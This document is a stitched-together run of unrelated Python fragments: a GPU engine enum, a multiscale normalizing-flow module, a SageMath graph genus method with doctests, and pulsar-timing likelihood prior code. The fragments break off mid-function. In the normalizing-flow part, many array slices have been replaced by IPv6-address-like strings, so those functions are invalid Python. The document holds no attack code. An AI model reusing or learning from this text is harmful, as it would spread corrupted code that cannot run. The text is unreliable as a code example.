MEDIA_ALL = 2 ## Access information about all media engines combined.
COPY_ALL = 3 ## Access information about all copy (blitter) engines combined.
COMPUTE_SINGLE = 4 ## Access information about a single compute engine - this is an engine
## that can process compute kernels. Note that single engines may share
## the same underlying accelerator resources as other engines so activity
## of such an engine may not be indicative of the underlying resource
## utilization - use ::ZES_ENGINE_GROUP_3D_RENDER_COMPUTE_ALL for that.
RENDER_SINGLE = 5 ## Access information about a single render engine - this is an engine
## that can process both 3D content and compute kernels. Note that single
## engines may share the same underlying accelerator resources as other
## engines so activity of such an engine may not be indicative of the
## underlying resource utilization - use
## ::ZES_ENGINE_GROUP_3D_RENDER_COMPUTE_ALL for that.
MEDIA_DECODE_SINGLE = 6 ## Access information about a single media decode engine. Note that
## single engines may share the same underlying accelerator resources as
## other engines so activity of such an engine may not be indicative of
## the underlying resource utilization - use ::ZES_ENGINE_GROUP_MEDIA_ALL
## for that.
MEDIA_ENCODE_SINGLE = 7 ## Access information about a single media encode engine. Note that
## single engines may share the same underlying accelerator resources as
## other engines so activity of such an engine may not be indicative of
## the underlying resource utilization - use ::ZES_ENGINE_GROUP_MEDIA_ALL
## for that.
COPY_SINGLE = 8 ## Access information about a single media encode engine. Note that
## single engines may share the same underlying accelerator resources as
## other engines so activity of such an engine may not be indicative of
## the underlying resource utilization - use ::ZES_ENGINE_GROUP_COPY_ALL
## for that.
MEDIA_ENHANCEMENT_SINGLE = 9 ## Access information about a single media | |
import argparse
import math
import numpy as np
import scipy.interpolate as interpolate
import torch
import torch.nn as nn
import torch.nn.functional as F
import lib.layers as layers
from .regularization import create_regularization_fns
from .layers.elemwise import _logit as logit
from .layers.elemwise import _sigmoid as sigmoid
from .utils import logpx_to_bpd
def standard_normal_logprob(z):
logZ = -0.5 * math.log(2 * math.pi)
return logZ - z.pow(2) / 2
def normal_logprob(x, mu=0, sigma=1):
if sigma is None:
sigma = 1.0
logZ = -math.log(sigma) -0.5 * math.log(2 * math.pi)
return logZ - ((x - mu)/sigma).pow(2) / 2
def avg2d(x):
bs, c, w, h = x.shape
if x.shape[1:] == (3, 1, 1):
return x.mean(1, keepdim=True)
else:
kernel = torch.tensor([[0.25, 0.25], [0.25, 0.25]]).unsqueeze(0).unsqueeze(0).expand(c, 1, 2, 2).to(x.device)
return F.conv2d(x.float(), kernel, stride=2, groups=c)
def avg_2d_in_1d(x, ch='height'):
assert ch in ['height', 'width']
if x.shape[1:] == (3, 1, 1):
return x.mean(1, keepdim=True)
else:
if ch == 'width':
return (x[:, :, :, ::2] + x[:, :, :, 1::2])/2
else:
return (x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, :] + x[:, :, fc00:db20:35b:7399::5, :])/2
class Downsample(nn.Module):
def __init__(self, tau=0.5, iters=1):
super().__init__()
self.heat = Heat(tau, iters)
#self.pick = Pick()
def forward(self, X, sh):
Y, _ = self.heat(X)
out = F.interpolate(Y, size=sh, mode='nearest')
return out
class Pyramid(nn.Module):
def __init__(self, image_shapes, mode='image'):
super().__init__()
self.image_shapes = image_shapes
self.mode = mode
def forward(self, img):
# img: [B, ch, height, width]
imgs = []
current = img.float()
imgs.append(current)
if self.mode == '1d':
l = 0
while l < len(self.image_shapes) - 1:
if l % 2 == 0:
current = avg_2d_in_1d(current, ch='height')
else:
current = avg_2d_in_1d(current, ch='width')
imgs.append(current)
l += 1
else:
for i in range(len(self.image_shapes)-1):
current = avg2d(current)
imgs.append(current)
imgs.reverse()
return imgs
def make_image_shapes(max_scales, im_size, im_ch, factor=0.5, mode='image'):
# Data shapes
image_shapes = []
if mode == '1d':
MAX = int(np.log2(im_size)*2 + 1)
assert max_scales <= (MAX+1 if im_ch == 3 else MAX), f"max_scales cannot be greater than {MAX+1 if im_ch == 3 else MAX}, given {max_scales}"
image_shapes.append((im_ch, im_size, im_size))
size_old = im_size
l = 0
while l < MAX-1:
if l % 2 == 0:
size = int(round(size_old * factor))
image_shapes.append((im_ch, size, size_old))
else:
image_shapes.append((im_ch, size, size))
size_old = size
l += 1
if im_ch == 3:
image_shapes.append((1, 1, 1))
else:
MAX = int(np.log2(im_size) + 1)
assert max_scales <= (MAX+1 if im_ch == 3 else MAX), f"max_scales cannot be greater than {MAX+1 if im_ch == 3 else MAX}, given {max_scales}"
for l in range(MAX):
size = int(round(im_size * factor**l))
image_shapes.append((im_ch, size, size))
if im_ch == 3:
image_shapes.append((1, 1, 1))
image_shapes = image_shapes[:max_scales]
image_shapes.reverse()
return image_shapes
def std_for_shapes_1d(norm_res, input_shapes):
# Actual norm_res (128) is double the default (64)! Because std formula has an erroneous "+ 1".
# Retaining it for legacy.
stds = []
for shape in input_shapes:
stds.append(np.sqrt(1/2**(2*np.log2(norm_res) - np.log2(shape[1]) - np.log2(shape[2]) + 1)))
if input_shapes[-1][0] == 3 and input_shapes[0] == (1, 1, 1):
stds[0], stds[1] = np.sqrt(1/3) * stds[0], np.sqrt(2/3) * stds[1]
return stds
def std_for_shapes_2d(norm_res, input_shapes):
stds = []
for shape in input_shapes:
stds.append(np.sqrt(3/4**(np.log2(norm_res) - np.log2(shape[1]))))
stds[0] = stds[0]/np.sqrt(3)
if input_shapes[-1][0] == 9 and input_shapes[0] == (1, 1, 1):
stds[0], stds[1] = np.sqrt(1/3) * stds[0], np.sqrt(2/3) * stds[0]
return stds
def combine1d(y, xbar):
xa = xbar + y
xb = xbar - y
y_shape = list(y.shape)
cat_dim = -1 if y_shape[-1] == y_shape[-2] else -2
y_shape[cat_dim] = int(y_shape[cat_dim]*2)
x = torch.cat((xa.unsqueeze(cat_dim), xb.unsqueeze(cat_dim)), dim=cat_dim).reshape(y_shape)
return x
def combine1ch2ch(y1, y2, xbar):
x1 = xbar + y1
x2 = xbar - y1/2 + np.sqrt(3)/2*y2
x3 = xbar - y1/2 - np.sqrt(3)/2*y2
return torch.cat([x1, x2, x3], dim=1)
def combine2d(y1, y2, y3, xbar):
# y1, y2, y3 = y[:, 0:xbar.shape[1]], y[:, xbar.shape[1]:2*xbar.shape[1]], y[:, 2*xbar.shape[1]:3*xbar.shape[1]]
x1 = y1 + xbar
x2 = - 1/3*y1 + 2*np.sqrt(2)/3*y2 + xbar
x3 = - 1/3*y1 - np.sqrt(2)/3*y2 + np.sqrt(6)/3*y3 + xbar
x4 = - 1/3*y1 - np.sqrt(2)/3*y2 - np.sqrt(6)/3*y3 + xbar
x = torch.empty(*xbar.shape[:2], xbar.shape[2]*2, xbar.shape[3]*2).to(xbar)
x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, ::2] = x1
x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 1::2] = x2
x[:, :, fc00:db20:35b:7399::5, ::2] = x3
x[:, :, fc00:db20:35b:7399::5, 1::2] = x4
return x
def split2d(x):
x1 = x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, ::2]
x2 = x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 1::2]
x3 = x[:, :, fc00:db20:35b:7399::5, ::2]
x4 = x[:, :, fc00:db20:35b:7399::5, 1::2]
y1 = 3/4*x1 - 1/4*x2 - 1/4*x3 - 1/4*x4
y2 = 2*np.sqrt(2)/4*x2 - np.sqrt(2)/4*(x3 + x4)
y3 = np.sqrt(6)/4*(x3 - x4)
return y1, y2, y3
def split2d_wavelet(x):
x1 = x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, ::2]
x2 = x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 1::2]
x3 = x[:, :, fc00:db20:35b:7399::5, ::2]
x4 = x[:, :, fc00:db20:35b:7399::5, 1::2]
y1 = 1/2*x1 + 1/2*x2 - 1/2*x3 - 1/2*x4
y2 = 1/2*x1 - 1/2*x2 + 1/2*x3 - 1/2*x4
y3 = 1/2*x1 - 1/2*x2 - 1/2*x3 + 1/2*x4
xbar = 1/4*x1 + 1/4*x2 + 1/4*x3 + 1/4*x4
return y1, y2, y3, xbar
def combine2d_wavelet(y1, y2, y3, xbar):
# y1, y2, y3 = y[:, 0:xbar.shape[1]], y[:, xbar.shape[1]:2*xbar.shape[1]], y[:, 2*xbar.shape[1]:3*xbar.shape[1]]
x1 = y1/2 + y2/2 + y3/2 + xbar
x2 = y1/2 - y2/2 - y3/2 + xbar
x3 = -y1/2 + y2/2 - y3/2 + xbar
x4 = -y1/2 - y2/2 + y3/2 + xbar
x = torch.empty(*xbar.shape[:2], xbar.shape[2]*2, xbar.shape[3]*2).to(xbar)
x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, ::2] = x1
x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 1::2] = x2
x[:, :, fc00:db20:35b:7399::5, ::2] = x3
x[:, :, fc00:db20:35b:7399::5, 1::2] = x4
return x
def split2d_mrcnf(x):
c = math.pow(2, 2/3)
x1 = x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, ::2]
x2 = x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 1::2]
x3 = x[:, :, fc00:db20:35b:7399::5, ::2]
x4 = x[:, :, fc00:db20:35b:7399::5, 1::2]
y1 = 1/c*x1 + 1/c*x2 - 1/c*x3 - 1/c*x4
y2 = 1/c*x1 - 1/c*x2 + 1/c*x3 - 1/c*x4
y3 = 1/c*x1 - 1/c*x2 - 1/c*x3 + 1/c*x4
xbar = 1/4*x1 + 1/4*x2 + 1/4*x3 + 1/4*x4
return y1, y2, y3, xbar
def combine2d_mrcnf(y1, y2, y3, xbar):
c = math.pow(2, 2/3)
# y1, y2, y3 = y[:, 0:xbar.shape[1]], y[:, xbar.shape[1]:2*xbar.shape[1]], y[:, 2*xbar.shape[1]:3*xbar.shape[1]]
x1 = c*y1/4 + c*y2/4 + c*y3/4 + xbar
x2 = c*y1/4 - c*y2/4 - c*y3/4 + xbar
x3 = -c*y1/4 + c*y2/4 - c*y3/4 + xbar
x4 = -c*y1/4 - c*y2/4 + c*y3/4 + xbar
x = torch.empty(*xbar.shape[:2], xbar.shape[2]*2, xbar.shape[3]*2).to(xbar)
x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, ::2] = x1
x[:, :, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, 1::2] = x2
x[:, :, fc00:db20:35b:7399::5, ::2] = x3
x[:, :, fc00:db20:35b:7399::5, 1::2] = x4
return x
class CNFMultiscale(nn.Module):
def __init__(self, max_scales=2, factor=0.5, concat_input=True,
mode='image', std_scale=True, joint=False,
regs=argparse.Namespace(kinetic_energy=0.0, jacobian_norm2=0.0),
bn=False, im_ch=3, im_size=32, nbits=8,
dims="64,64,64", strides="1,1,1,1", num_blocks="2,2",
zero_last=True, conv=True, layer_type="concat", nonlinearity="softplus",
time_length=1.0, train_T=False, steer_b=0.0,
div_samples=1, divergence_fn="approximate",
logit=True, alpha=0.05, normal_resolution=64,
solver='bosh3',
disable_cuda=False,
**kwargs):
super().__init__()
self.max_scales = max_scales
self.factor = factor
self.concat_input = concat_input
self.mode = mode
assert self.mode in ['wavelet', 'mrcnf']
self.std_scale = std_scale
self.joint = joint
self.regs = regs
self.bn = bn
self.im_ch, self.im_size, self.nbits = im_ch, im_size, nbits
self.dims, self.strides, self.num_blocks = dims, strides, num_blocks
self.zero_last, self.conv, self.layer_type, self.nonlinearity = zero_last, conv, layer_type, nonlinearity
self.time_length, self.train_T, self.steer_b = time_length, train_T, steer_b
self.div_samples, self.divergence_fn = div_samples, divergence_fn
self.logit, self.alpha = logit, alpha
self.normal_resolution = normal_resolution
self.solver = solver
self.disable_cuda = disable_cuda
self._scale = -1
self.device = torch.device("cuda:%d"%torch.cuda.current_device() if torch.cuda.is_available() and not disable_cuda else "cpu")
self.cvt = lambda x: x.type(torch.float32).to(self.device, non_blocking=True)
# Set image shapes
self.image_shapes = make_image_shapes(max_scales=max_scales, im_size=im_size, im_ch=im_ch, mode=mode)
self.num_scales = len(self.image_shapes)
self.pyramid = Pyramid(image_shapes=self.image_shapes, mode=mode)
MAX = int(np.log2(im_size) + 1)
self.input_shapes = [self.image_shapes[-min(MAX, max_scales)]] + self.image_shapes[-min(MAX, max_scales):-1]
self.input_shapes = [(sh[0] if i==0 else sh[0]*3, sh[1], sh[2]) for i, sh in enumerate(self.input_shapes)]
self.ch1toch3 = False
if max_scales == MAX+1 and im_ch == 3:
self.ch1toch3 = True
self.input_shapes = [(1, 1, 1), (2, 1, 1)] + self.input_shapes[1:]
if self.mode == 'wavelet':
self.z_stds = [np.sqrt(1/4**(np.log2(self.normal_resolution) - np.log2(sh[-1]))) for sh in self.image_shapes] if self.std_scale else [None] * self.num_scales
elif self.mode == 'mrcnf':
c = math.pow(2, 2/3)
self.z_stds = [np.sqrt((1 if s == 0 else c)*1/4**(np.log2(self.normal_resolution) - np.log2(sh[-1]))) for s, sh in enumerate(self.image_shapes)] if self.std_scale else [None] * self.num_scales
self.bns = None
self.coarse_bns = None
if self.concat_input:
self.concat_shapes = [None] + self.image_shapes[:-1]
else:
self.concat_shapes = [None] * len(self.image_shapes)
self.regularization_fns, self.regularization_coeffs = create_regularization_fns(self.regs)
# Create models
models = []
first = True
for input_sh, concat_sh, bl, std in zip(self.input_shapes, self.concat_shapes, self.num_blocks, self.z_stds):
models.append(self.create_model(input_sh, concat_sh, bl, first=first, std=std))
first = False
self.scale_models = nn.ModuleList(models) | |
(0 <= t2 and t2 <= 1):
if p1[1] + t1 * dy == q1[1] or p1[1] + t2 * dy == q2[1]:
return False
else:
t1 = Rational(q1[1] - p1[1]) / dy
t2 = Rational(q2[1] - p1[1]) / dy
if (0 <= t1 and t1 <= 1) or (0 <= t2 and t2 <= 1):
if p1[0] + t1 * dx == q1[0] or p1[0] + t2 * dx == q2[0]:
return False
else:
s = (dx * Rational(q1[1] - p1[1]) + dy * Rational(p1[0] - q1[0])) / (da * dy - db * dx)
t = (da * Rational(p1[1] - q1[1]) + db * Rational(q1[0] - p1[0])) / (db * dx - da * dy)
if 0 <= s and s <= 1 and 0 <= t and t <= 1:
print('fail on', p1, p2, ' : ',q1, q2)
print(edge1, edge2)
return False
return True
def genus(self, set_embedding=True, on_embedding=None, minimal=True, maximal=False, circular=None, ordered=True):
r"""
Return the minimal genus of the graph.
The genus of a compact surface is the number of handles it has. The
genus of a graph is the minimal genus of the surface it can be embedded
into. It can be seen as a measure of non-planarity; a planar graph has
genus zero.
.. NOTE::
This function uses Euler's formula and thus it is necessary to
consider only connected graphs.
INPUT:
- ``set_embedding`` -- boolean (default: ``True``); whether or not to
store an embedding attribute of the computed (minimal) genus of the
graph
- ``on_embedding`` -- two kinds of input are allowed (default:
``None``):
- a dictionary representing a combinatorial embedding on which the
genus should be computed. Note that this must be a valid embedding
for the graph. The dictionary structure is given by: ``vertex1:
[neighbor1, neighbor2, neighbor3], vertex2: [neighbor]`` where there
is a key for each vertex in the graph and a (clockwise) ordered list
of each vertex's neighbors as values. The value of ``on_embedding``
takes precedence over a stored ``_embedding`` attribute if
``minimal`` is set to ``False``.
- The value ``True``, in order to indicate that the embedding stored
as ``_embedding`` should be used (see examples).
- ``minimal`` -- boolean (default: ``True``); whether or not to compute
the minimal genus of the graph (i.e., testing all embeddings). If
minimal is ``False``, then either ``maximal`` must be ``True`` or
``on_embedding`` must not be ``None``. If ``on_embedding`` is not
``None``, it will take priority over ``minimal``. Similarly, if
``maximal`` is ``True``, it will take priority over ``minimal``.
- ``maximal`` -- boolean (default: ``False``); whether or not to compute
the maximal genus of the graph (i.e., testing all embeddings). If
``maximal`` is ``False``, then either ``minimal`` must be ``True`` or
``on_embedding`` must not be ``None``. If ``on_embedding`` is not
``None``, it will take priority over ``maximal``. However, ``maximal``
takes priority over the default ``minimal``.
- ``circular`` -- list (default: ``None``); if ``circular`` is a list of
vertices, the method computes the genus preserving a planar embedding
of the this list. If ``circular`` is defined, ``on_embedding`` is not
a valid option.
- ``ordered`` -- boolean (default: ``True``); if ``circular`` is
``True``, then whether or not the boundary order may be permuted
(default is ``True``, which means the boundary order is preserved)
EXAMPLES::
sage: g = graphs.PetersenGraph()
sage: g.genus() # tests for minimal genus by default
1
sage: g.genus(on_embedding=True, maximal=True) # on_embedding overrides minimal and maximal arguments
1
sage: g.genus(maximal=True) # setting maximal to True overrides default minimal=True
3
sage: g.genus(on_embedding=g.get_embedding()) # can also send a valid combinatorial embedding dict
3
sage: (graphs.CubeGraph(3)).genus()
0
sage: K23 = graphs.CompleteBipartiteGraph(2,3)
sage: K23.genus()
0
sage: K33 = graphs.CompleteBipartiteGraph(3,3)
sage: K33.genus()
1
Using the circular argument, we can compute the minimal genus preserving
a planar, ordered boundary::
sage: cube = graphs.CubeGraph(2)
sage: cube.genus(circular=['01','10'])
0
sage: cube.is_circular_planar()
True
sage: cube.genus(circular=['01','10'])
0
sage: cube.genus(circular=['01','10'], on_embedding=True)
Traceback (most recent call last):
...
ValueError: on_embedding is not a valid option when circular is defined
sage: cube.genus(circular=['01','10'], maximal=True)
Traceback (most recent call last):
...
NotImplementedError: cannot compute the maximal genus of a genus respecting a boundary
Note: not everything works for multigraphs, looped graphs or digraphs.
But the minimal genus is ultimately computable for every connected graph
-- but the embedding we obtain for the simple graph can't be easily
converted to an embedding of a non-simple graph. Also, the maximal
genus of a multigraph does not trivially correspond to that of its
simple graph::
sage: G = DiGraph({0: [0, 1, 1, 1], 1: [2, 2, 3, 3], 2: [1, 3, 3], 3: [0, 3]})
sage: G.genus()
Traceback (most recent call last):
...
NotImplementedError: cannot work with embeddings of non-simple graphs
sage: G.to_simple().genus()
0
sage: G.genus(set_embedding=False)
0
sage: G.genus(maximal=True, set_embedding=False)
Traceback (most recent call last):
...
NotImplementedError: cannot compute the maximal genus of a graph with loops or multiple edges
We break graphs with cut vertices into their blocks, which greatly
speeds up computation of minimal genus. This is not implemented for
maximal genus::
sage: G = graphs.RandomBlockGraph(10, 5)
sage: G.genus()
10
"""
if not self.is_connected():
raise TypeError("the input Graph must be connected to use Euler's Formula to compute minimal genus")
G = self.to_simple(immutable=False)
verts = G.order()
edges = G.size()
if maximal:
minimal = False
if circular is not None:
if not isinstance(circular, list):
raise ValueError("'circular' is expected to be a list")
if maximal:
raise NotImplementedError("cannot compute the maximal genus of a genus respecting a boundary")
if on_embedding is not None:
raise ValueError("on_embedding is not a valid option when circular is defined")
boundary = circular
if hasattr(G, '_embedding'):
del(G._embedding)
extra = G.add_vertex()
G.add_edges((vertex, extra) for vertex in boundary)
verts += 1
extra_edges = []
if ordered: # WHEEL
for e in zip(boundary[-1], boundary[1:]):
if not G.has_edge(e):
G.add_edge(e)
extra_edges.append(e)
if not G.has_edge(boundary[-1], boundary[0]):
G.add_edge(boundary[-1], boundary[0])
extra_edges.append((boundary[-1], boundary[0]))
# else STAR (empty list of extra edges)
edges = G.size()
if on_embedding is not None:
if self.has_loops() or self.is_directed() or self.has_multiple_edges():
raise NotImplementedError("cannot work with embeddings of non-simple graphs")
if isinstance(on_embedding, dict):
faces = len(self.faces(on_embedding))
return (2 - verts + edges - faces) // 2
elif on_embedding:
try:
faces = len(self.faces(self._embedding))
except AttributeError:
raise AttributeError('graph must have attribute _embedding set to compute current (embedded) genus')
return (2 - verts + edges - faces) // 2
else: # then compute either maximal or minimal genus of all embeddings
from . import genus
if set_embedding:
if self.has_loops() or self.is_directed() or self.has_multiple_edges():
raise NotImplementedError("cannot work with embeddings of non-simple graphs")
if minimal:
B,C = G.blocks_and_cut_vertices()
embedding = {}
g = 0
for block in B:
H = G.subgraph(block)
g += genus.simple_connected_graph_genus(H, set_embedding=True, check=False, minimal=True)
emb = H.get_embedding()
for v in emb:
if v in embedding:
embedding[v] += emb[v]
else:
embedding[v] = emb[v]
self._embedding = embedding
else:
g = genus.simple_connected_graph_genus(G, set_embedding=True, check=False, minimal=minimal)
self._embedding = G._embedding
return g
else:
if maximal and (self.has_multiple_edges() or self.has_loops()):
raise NotImplementedError("cannot compute the maximal genus of a graph with loops or multiple edges")
if minimal:
B,C = G.blocks_and_cut_vertices()
g = 0
for block in B:
H = G.subgraph(block)
g += genus.simple_connected_graph_genus(H, set_embedding=False, check=False, minimal=True)
return g
else:
return genus.simple_connected_graph_genus(G, set_embedding=False, check=False, minimal=minimal)
def crossing_number(self):
r"""
Return the crossing number of the graph.
The crossing number of a graph is the minimum number of edge crossings
needed to draw the graph on a plane. It can be seen as a measure of
non-planarity; a planar graph has crossing number zero.
See the :wikipedia:`Crossing_number` for more information.
EXAMPLES::
sage: P = graphs.PetersenGraph()
sage: P.crossing_number()
2
ALGORITHM:
This is slow brute force implementation: for every `k` pairs of edges
try adding a new vertex for a crossing point for them. If the result is
not planar in any of those, try `k+1` pairs.
Computing the crossing number is NP-hard problem.
TESTS:
Empty graph, graph without edges::
sage: E = graphs.EmptyGraph()
| |
'spectrum':
if args.clkPrior == 'uniform':
priorfac_clk = np.sum(np.log(10.0**clk_spec * np.log(10.0)))
elif args.clkPrior == 'loguniform':
priorfac_clk = 0.0
elif not args.incClk:
priorfac_clk = 0.0
if args.incDip:
### powerlaw spectral model ###
if args.dipSpecModel == 'powerlaw':
if args.dipPrior == 'uniform':
priorfac_dip = np.log(Adip * np.log(10.0))
elif args.dipPrior == 'loguniform':
priorfac_dip = 0.0
### free spectral model ###
elif args.dipSpecModel == 'spectrum':
if args.dipPrior == 'uniform':
priorfac_dip = np.sum(np.log(10.0**dip_spec * np.log(10.0)))
elif args.dipPrior == 'loguniform':
priorfac_dip = 0.0
elif not args.incDip:
priorfac_dip = 0.0
if args.incCm:
### powerlaw spectral model ###
if args.cmSpecModel == 'powerlaw':
if args.cmPrior == 'uniform':
priorfac_cm = np.log(Acm * np.log(10.0))
elif args.cmPrior == 'loguniform':
priorfac_cm = 0.0
### free spectral model ###
elif args.cmSpecModel == 'spectrum':
if args.cmPrior == 'uniform':
priorfac_cm = np.sum(np.log(10.0**cm_spec * np.log(10.0)))
elif args.cmPrior == 'loguniform':
priorfac_cm = 0.0
elif not args.incCm:
priorfac_cm = 0.0
if args.incEph and not args.jplBasis:
### powerlaw spectral model ###
if args.ephSpecModel == 'powerlaw':
if args.ephPrior == 'uniform':
priorfac_eph = np.log(Aephx * np.log(10.0)) + \
np.log(Aephy * np.log(10.0)) + \
np.log(Aephz * np.log(10.0))
elif args.ephPrior == 'loguniform':
priorfac_eph = 0.0
### free spectral model ###
elif args.ephSpecModel == 'spectrum':
if args.ephPrior == 'uniform':
priorfac_eph = np.sum(np.log(10.0**eph_spec[0,:] * np.log(10.0))) + \
np.sum(np.log(10.0**eph_spec[1,:] * np.log(10.0))) + \
np.sum(np.log(10.0**eph_spec[2,:] * np.log(10.0)))
elif args.ephPrior == 'loguniform':
priorfac_eph = 0.0
else:
priorfac_eph = 0.0
priorfac_planetmassdelta = 0.0
if args.det_signal and args.eph_planetdelta and \
args.eph_planetmass and args.eph_planetmassprior == 'official':
mu = 0.0
sig = np.array([7.71489350e-12, 4.79352991e-14, 6.31466493e-15,
2.08290722e-15, 1.54976690e-11, 8.17306184e-12,
5.71923361e-11, 7.96103855e-11, 1.50162644e-12])
for jj in range(num_planets):
priorfac_planetmassdelta += np.log( np.exp( -0.5 * (mass_perturb[jj] - mu)**2.0 / sig[jj]**2.0) \
/ np.sqrt(2.0*np.pi*sig[jj]**2.0) )
else:
priorfac_planetmassdelta = 0.0
priorfac_ephphysmodel = 0.0
if args.det_signal and args.eph_physmodel:
mu = 0.0
sig = np.array([1.54976690e-11, 8.17306184e-12,
5.71923361e-11, 7.96103855e-11])
for jj in range(len(sig)):
priorfac_ephphysmodel += np.log( np.exp( -0.5 * (eph_physmodel_params[jj+1] - mu)**2.0 / sig[jj]**2.0) \
/ np.sqrt(2.0*np.pi*sig[jj]**2.0) )
if args.incJuporb and args.jup_orbmodel == 'orbelements' and args.eph_priorjpl:
# prior covariance on PCA coefficients from JPL and M. Vallisneri
pca_cov = np.array([[ 3.02523645e-06, 3.97004662e-06, 2.24903984e-07,
-2.66611739e-07, -4.71190041e-08, 1.30078749e-07],
[ 3.97004662e-06, 5.23961306e-06, 3.63693174e-07,
-1.97032683e-07, -1.36506909e-07, 9.00474450e-09],
[ 2.24903984e-07, 3.63693174e-07, 2.39866742e-07,
-2.80080126e-07, -2.31449063e-07, 1.89317437e-07],
[ -2.66611739e-07, -1.97032683e-07, -2.80080126e-07,
9.73091356e-06, 1.04977834e-07, -4.69086192e-06],
[ -4.71190041e-08, -1.36506909e-07, -2.31449063e-07,
1.04977834e-07, 2.37264475e-07, -8.60592321e-08],
[ 1.30078749e-07, 9.00474450e-09, 1.89317437e-07,
-4.69086192e-06, -8.60592321e-08, 6.31390395e-06]])
eph_rv = scistats.multivariate_normal(cov = args.ephpriorjpl_efac**2.0 * pca_cov)
priorfac_ephphysmodel += eph_rv.logpdf(eph_physmodel_params[5:11])
else:
priorfac_ephphysmodel = 0.0
priorfac_roemermix = 0.0
if args.det_signal and args.eph_roemermix and (args.eph_roemerwgts_fix is None):
rmixprior = scistats.dirichlet( (args.eph_dirichlet_alpha * np.ones(num_ephs,dtype=int)).tolist() )
priorfac_roemermix += np.log(rmixprior.pdf(roemer_wgts))
else:
priorfac_roemermix = 0.0
priorfac_corr = 0.0
if args.incGWB and args.incCorr:
if args.gwbTypeCorr == 'modelIndep':
jacobian = np.zeros((npairs,npairs))
if args.corrJacobian == 'full':
ct = 0
for ii in range(len(phi_els)):
for jj in range(len(phi_els[ii])):
dummy_utriang = upper_triang[jj:,ii+1].copy()
dummy_utriang[0] = -np.sin(phi_els[ii][jj]) * dummy_utriang[0] / np.cos(phi_els[ii][jj])
dummy_utriang[1:] = np.cos(phi_els[ii][jj]) * dummy_utriang[1:] / np.sin(phi_els[ii][jj])
dummy_utriang = np.append(np.zeros(len(upper_triang[:jj,ii+1])), dummy_utriang)
deriv = np.zeros_like(upper_triang)
deriv[:,ii+1] = np.dot(upper_triang.T, dummy_utriang)
deriv = deriv + deriv.T
jacobian[:,ct] = deriv[np.triu_indices(npsr,k=1)]
ct += 1
tmp = np.linalg.slogdet(jacobian)
priorfac_corr = 0.5*tmp[1]
elif args.corrJacobian == 'simple':
priorfac_corr = np.sum(np.log(np.abs(np.array([-np.sin(phi_els[ii][0])
for ii in range(len(phi_els))]))))
else:
priorfac_corr = 0.0
### Gaussian prior on modeled psr positions ###
### Currently assumes only one frequency window ###
elif args.gwbTypeCorr == 'psrlocsVary':
priorfac_corr = 0.0
for ii,p in enumerate(psr):
if args.psrlocsPrior == 'normal':
sig = 0.5
priorfac_corr += np.log( np.exp( -0.5 * (varyLocs[ii,0] - p.psr_locs[0])**2.0 / sig**2.0) / \
np.sqrt(2.0*np.pi*sig**2.0) ) + \
np.log( np.exp( -0.5 * (varyLocs[ii,1] - np.pi/2. + p.psr_locs[1])**2.0 / sig**2.0) / \
np.sqrt(2.0*np.pi*sig**2.0) )
elif args.psrlocsPrior == 'uniform':
if np.abs(varyLocs[ii,0] - p.psr_locs[0]) <= 1.0 and \
np.abs(varyLocs[ii,1] - np.pi/2. + p.psr_locs[1]) <= 1.0:
priorfac_corr += 0.0
else:
priorfac_corr += -np.inf
else:
priorfac_corr = 0.0
else:
priorfac_corr = 0.0
elif not args.incGWB and not args.incCorr:
priorfac_corr = 0.0
### Reweighting corr-vs-uncorr GWB models ###
### to ensure proper mixing ###
priorfac_gwbmod = 0.0
if args.incGWB and args.incCorr and args.gwbModelSelect:
if gwb_modindex == 0:
priorfac_gwbmod = ( np.log( args.gwbCorrModWgt / (1.0 + args.gwbCorrModWgt) )
- np.log(1.0/2.0) )
elif gwb_modindex == 1:
priorfac_gwbmod = ( np.log( 1.0 / (1.0 + args.gwbCorrModWgt) )
- np.log(1.0/2.0) )
### Jacobian and prior on cgw properties ###
if args.det_signal:
if args.cgw_search:
### uniform prior ###
if args.cgwPrior == 'uniform':
priorfac_detsig = np.log(hstrain * np.log(10.0))
elif args.cgwPrior == 'loguniform':
priorfac_detsig = 0.0
### pulsar distance prior ###
if args.psrTerm:
for ii, p in enumerate(psr):
mu = p.h5Obj['pdist'].value
sig = p.h5Obj['pdistErr'].value
priorfac_detsig += \
np.log( np.exp( -0.5 * (psrdists[ii] - mu)**2.0 / sig**2.0) / \
np.sqrt(2.0*np.pi*sig**2.0) )
else:
priorfac_detsig = 0.0
elif not args.det_signal:
priorfac_detsig = 0.0
#####################################
# Finally, return the log-likelihood
return (1.0/args.softParam) * (logLike + priorfac_gwb + priorfac_gwbmod + priorfac_gwline + \
priorfac_red + priorfac_dm + priorfac_clk + priorfac_cm + \
priorfac_eph + priorfac_planetmassdelta + priorfac_ephphysmodel + \
priorfac_roemermix + priorfac_band + priorfac_dip + \
priorfac_corr + priorfac_detsig)
#########################
#########################
# Set up the parameter list
parameters=[]
if not args.fixRed:
if args.redSpecModel == 'powerlaw':
[parameters.append('Ared_'+p.name) for p in psr]
[parameters.append('gam_red_'+p.name) for p in psr]
elif args.redSpecModel == 'spectrum':
for ii in range(len(psr)):
for jj in range(nmodes_red):
parameters.append('redSpec'+'_{0}_'.format(jj+1)+psr[ii].name)
if args.incDM and not args.fixDM:
if args.dmSpecModel == 'powerlaw':
[parameters.append('Adm_'+p.name) for p in psr]
[parameters.append('gam_dm_'+p.name) for p in psr]
elif args.dmSpecModel == 'spectrum':
for ii in range(len(psr)):
for jj in range(nmodes_dm):
parameters.append('dmSpec'+'_{0}_'.format(jj+1)+psr[ii].name)
if args.varyWhite:
for ii,p in enumerate(psr):
systems = p.sysflagdict[args.sysflag_target]
for jj in range(len(systems)):
parameters.append('EFAC_'+p.name+'_'+systems.keys()[jj])
for jj in range(len(systems)):
